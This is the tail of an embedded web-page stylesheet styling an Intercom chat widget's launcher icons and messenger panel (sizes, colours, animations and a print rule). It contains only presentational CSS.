  .intercom-lightweight-app-launcher-icon-self-serve {
    
        opacity: 1;
        transform: rotate(0deg) scale(1);
      
  }

  .intercom-lightweight-app-launcher-icon-self-serve svg {
    height: 56px;
  }

  .intercom-lightweight-app-launcher-icon-self-serve svg path {
    fill: rgb(255, 255, 255);
  }

  .intercom-lightweight-app-launcher-custom-icon-open {
    max-height: 36px;
    max-width: 36px;
    
        opacity: 1;
        transform: rotate(0deg) scale(1);
      
  }

  .intercom-lightweight-app-launcher-icon-minimize {
    
        opacity: 0;
        transform: rotate(-60deg) scale(0);
      
  }

  .intercom-lightweight-app-launcher-icon-minimize svg {
    width: 16px;
  }

  .intercom-lightweight-app-launcher-icon-minimize svg path {
    fill: rgb(255, 255, 255);
  }

  .intercom-lightweight-app-messenger {
    position: fixed;
    z-index: 2147483003;
    overflow: hidden;
    background-color: white;
    animation: intercom-lightweight-app-messenger 250ms ease-out;
    
        width: 376px;
        height: calc(100% - 120px);
        max-height: 704px;
        min-height: 250px;
        right: 20px;
        bottom: 100px;
        box-shadow: 0 5px 40px rgba(0,0,0,0.16);
        border-radius: 8px;
      
  }

  .intercom-lightweight-app-messenger-header {
    height: 75px;
    background: linear-gradient(
      135deg,
      rgb(17, 25, 39) 0%,
      rgb(0, 0, 0) 100%
    );
  }

  @media print {
    .intercom-lightweight-app {
      display: none;
    }
  }
</style></div></body></html>